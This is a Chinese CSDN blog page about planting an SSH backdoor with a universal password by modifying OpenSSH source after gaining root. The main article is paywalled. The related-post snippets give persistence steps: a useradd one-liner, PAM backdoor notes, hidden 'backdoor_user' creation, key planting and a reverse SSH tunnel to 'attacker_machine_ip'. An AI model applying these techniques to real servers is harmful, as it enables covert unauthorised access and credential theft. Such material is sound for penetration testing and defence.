SSH后门万能密码

最新推荐文章于 2024-07-09 15:29:18 发布
最新推荐文章于 2024-07-09 15:29:18 发布
阅读量4.1k 收藏 19
点赞数 2
CC 4.0 BY-SA版权
分类专栏: linux系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36119192/article/details/96453711
本文介绍了一种通过修改SSH源代码在Linux服务器上创建隐秘后门的方法,涉及设置万能密码、记录登录日志以及规避检测的技巧。通过这种方式,攻击者可以保持持久的root权限。

当我们在获得一台Linux服务器的 root 权限后,我们第一想做的就是如何维持这个权限,维持权限肯定想到的就是在目标服务器留下一个后门。但是留普通后门,肯定很容易被发现。我们今天要讲的就是留一个SSH后门,是通过修改SSH源代码的方式来留一个万能的SSH密码。

环境:

软件包准备:

首先查看一下SSH的版本号,记录下来

ssh -V

了解本专栏 订阅专栏 解锁全文 超级会员免费看
Linux权限维持—后门
渗透之路,攻防之间皆学问
04-18 4267
Rootkit是一种特殊的恶意软件,它的功能是在安装目标上隐藏自身及指定的文件、进程和网络链接等信息,比较多见到的是Rootkit一般都和木马、后门等其他恶意程序结合使用。 rootkit是linux平台下最常见的一种木马后门工具,它主要是通过替换系统文件来达到入侵和隐藏的目的。rootkit主要分为文件级别的和内核级别的
【渗透测试】密码暴力破解工具——九头蛇(hydra)使用详解及实战
热门推荐
请大家直接把问题写在评论区或留言,不要只说一句"你好 或 在吗",我会尽快回复的。
05-05 8万+
【渗透测试】密码暴力破解工具——九头蛇(hydra)使用详解及实战
SSH PAM后门万能密码、记录密码
网络安全。
08-19 4600
PAM是Linux默认的ssh认证登录机制,我们可以通过修改源码来实现万能密码,记录登陆密码等功能。 1、在centos中需要关闭selinux。 永久关闭需要修改/etc/selinux/config,将其中SELINUX设置为disabled。 2、查看PAM版本。 rpm -qa|grep pam 源码下载地址:http://www.linux-pam.org/library/ 3、解压。 wget http://www.linux-pam.org/library/Linux-PAM-1.1.8
SSH常用指令与其中的密码学原理
m0_61056480的博客
05-14 411
ssh登录相关
演示ssh三种连接方式(密码 公钥 私钥)
hengge113的博客
08-16 1万+
ssh三种连接方式(密码 公钥 私钥)
应急响应之Linux权限维持--后门
明哥哥知识分享
01-14 951
本文将对Linux下常见的权限维持技术进行解析,知己知彼百战不殆。 1、一句话添加用户和密码 添加普通用户: # 创建一个用户名guest,密码123456的普通用户 useradd -p `openssl passwd -1 -salt 'salt' 123456` guest # useradd -p 方法 ` ` 是用来存放可执行的系统命令,"$()"也可以存放命令执行语句 useradd -p "$(openssl passwd -1 123456)" guest # chpasswd方法
ssh中的密码登录和密钥登录
m0_52165864的博客
07-30 2万+
这种加密方式是大家都知道的,发送方和接收方都是一样的。加解密的钥匙都是同一把,怎么样安全的保存这个密钥,这个密钥在需要加密的机器之前都是共享?很难保证这个密钥不被泄漏。
SSH连接密码问题:原因、表现与解决方案
定期分享我的发现和想法,感谢你的陪伴和支持
02-21 9663
遇到SSH服务器拒绝密码的问题时,首先应确定问题的具体原因,然后采取相应的解决措施。通常,这包括检查密码的正确性、服务器的配置、账户状态,以及密钥认证的设置。理解这些原因及其表现有助于快速诊断问题,并找到有效的解决方案,保障安全、高效的远程登录体验。在使用SSH时,我们可能会遇到服务器拒绝密码的问题,不论是在连接前确定账号密码还是在连接时输入账号密码。本文将探讨导致此问题的各种原因、它们的不同表现,以及相应的解决方案。🚀 欢迎一起踏上探险之旅,挖掘无限可能,共同成长!
使用ssh登录服务器(密码和私钥)
Wind_waving的博客
01-25 4801
使用密码 客户端命令行输入ssh root@公网ip,然后输入密码即可 使用公钥私钥 客户端:ssh-keygen -t rsa -b 4096或者ssh-keygen -t rsa -C "注释" -b 4096 参考如下,下图转载自博客 以上参数详细解释参考博客 上传公钥到服务器 在客户端输入L➜ ~ ssh-copy-id -i 客户端上公钥位置 root@公网IP 出现上图即表示已经添加成功,可以通过ssh root@公网ip -i 客户端私钥位置测试是否成功连接 完成以上步骤则已经可以通过s
SSH软连接后门
weixin_45209228的博客
03-13 559
SSH软连接后门
渗透linux的ssh,Linux系统安全之ssh后门
weixin_31559919的博客
05-12 275
1.ssh -V#查看当前的ssh版本信息#OpenSSH_5.3p1, OpenSSL 1.0.0-fips 29 Mar 20102.查找ssh的配置文件一般都在/etc/ssh中3.备份原来的文件的time将/etc/ssh下的文件的备份假设/etc/ssh/sshd_config 备份为/etc/ssh/sshd_config.old4.wget存在后门ssh#http://core.i...
ssh后门介绍与防御
有勇气的牛排博客
08-04 2036
文章目录1 介绍2 实战演练2.1 查看版本2.2 下载SSH配置文件2.3 安装2.4 修改后门密码and文件记录2.5 编译安装2.6 摸出痕迹3 防御ssh后门 1 介绍 当拿到root权限后,一般需要维持权限(留后门),可以做openssh后门,也就是root双密码,管理员一个密码,我们的后门一个密码。 2 实战演练 实验环境:Centos7 2.1 查看版本 ssh -v 可以对ssh备份配置文件,可以对后期的文件时间进行修改 cp -p /etc/ssh/ssh_config / etc/
了解有后门sshd服务是如何劫持密码
weixin_30826095的博客
09-03 248
  在服务器上安装一个打了后门补丁的sshd服务,当用户连接时,直接把密码记录下来,然后使用脚本发送到邮箱中。 (1).实验环境   使用CentOS6.2作为系统环境,查看sshd和gcc的版本 [root@CentOS6 ~]# uname -a Linux CentOS6.2 2.6.32-220.el6.x86_64 #1 SMP Tue Dec 6 19:48:22...
ssh建立后门的两种方法
安全汪
03-07 2235
以前看到过,但是今天找了很久才找到。所以做一下截图,以备下次忘记能快速找到
SSH密码暴力破解及防御实战
weixin_45798017的博客
04-11 236
Hydra
OpenSSH后门获取root密码及防范
weixin_30340745的博客
03-15 648
OpenSSH后门获取root密码及防范 相对于Windows操作系统,Linux操作系统的密码较难获取。而很多Linux服务器都配置了Openssh服务,在获取root权限的情况下,可以通过修改或者更新OpenSSH代码等方法,截取并保存其SSH登录账号密码,甚至可以留一个隐形的后门,达到长期控制linux服务器的目的。在很多Linux系统被入侵后都会在系统中留后门,使用OpenSS...
linux学习之登录密码ssh/telnet)
YU__MU__的博客
07-09 2304
etc/passwd具有统一性和标准型,各版本的Linux操作系统的/etc/passwd功能和内容格式基本相同,/etc/passwd文件为按行记录的文本文件,每行记录一个用户的信息,所有用户均可读/etc/passwd,只有超级用户可以写/etc/passwd。如果您想要获取Linux系统中用户的登录密码,这通常是不可能的,因为密码是经过加密处理的,而且出于安全考虑,没有直接的方式可以获取它们的明文形式。登录目录:该目录是用户登录系统后的默认目录,通常就是用户的主目录,一般在/home下。
SSH连接Linux
timshinlee的博客
02-26 746
SSH后门怎么做
最新发布
03-27
### 创建SSH后门的方法及注意事项 #### 方法概述 创建SSH后门是一种让攻击者能够在未经授权的情况下重新进入目标系统的机制。通常情况下,这种行为违反网络安全原则并可能触犯法律,在合法授权范围内(如渗透测试场景下),可以通过以下方式进行设置。 1. **配置无密码登录** 使用公私钥认证的方式可以让用户无需输入密码即可完成身份验证。具体步骤如下: - 在攻击者的机器上生成一对密钥对: ```bash ssh-keygen -t rsa -b 4096 ``` 这将在`~/.ssh/id_rsa.pub`中生成一个公钥文件[^1]。 - 将该公钥复制到目标服务器的`authorized_keys`文件中: ```bash ssh-copy-id user@target_server_ip ``` 2. **禁用密码登录** 修改目标服务器上的SSHD配置文件以增强安全性,同时确保只有持有正确私钥的人能够登录: ```bash vim /etc/ssh/sshd_config PasswordAuthentication no ChallengeResponseAuthentication no UsePAM yes AuthorizedKeysFile .ssh/authorized_keys ``` 配置完成后重启SSH服务使更改生效: ```bash systemctl restart sshd ``` 3. **隐藏后门账户** 创建一个新的低权限用户作为隐蔽入口,并赋予其必要的访问权限而不引起管理员注意: ```bash adduser --shell /bin/bash backdoor_user passwd backdoor_user ``` 或者直接导入上述生成好的公钥至新用户的`.ssh/authorized_keys`文件内。 4. **端口转发与反向Shell** 如果防火墙阻止外部连接,则可以考虑使用端口转发或者建立反向Shell来绕过限制。例如,从内部发起请求保持持久化通信链路: ```bash ssh -R 2222:localhost:22 reverse_shell_user@attacker_machine_ip ``` #### 安全注意事项 - 确保所有操作均获得适当许可,非法入侵活动可能导致法律责任。 - 对于任何部署的后门措施都要有清晰记录以便后续审计追踪。 - 加强系统日志监控,及时发现异常登录尝试或可疑行为[^4]。 - 定期更新软件版本修补已知漏洞减少被利用风险[^2]。 - 不要忽略物理层面防护同样重要,比如BIOS锁、机箱开关保护等附加手段加强整体防御体系[^3]。 ```python import paramiko client = paramiko.SSHClient() client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) private_key_path = '/path/to/private/key' mykey = paramiko.RSAKey.from_private_key_file(private_key_path) try: client.connect('target_server_ip', username='backdoor_user', pkey=mykey, timeout=5) except Exception as e: print(f'Connection failed with error {e}') finally: client.close() ```
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

谢公子

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值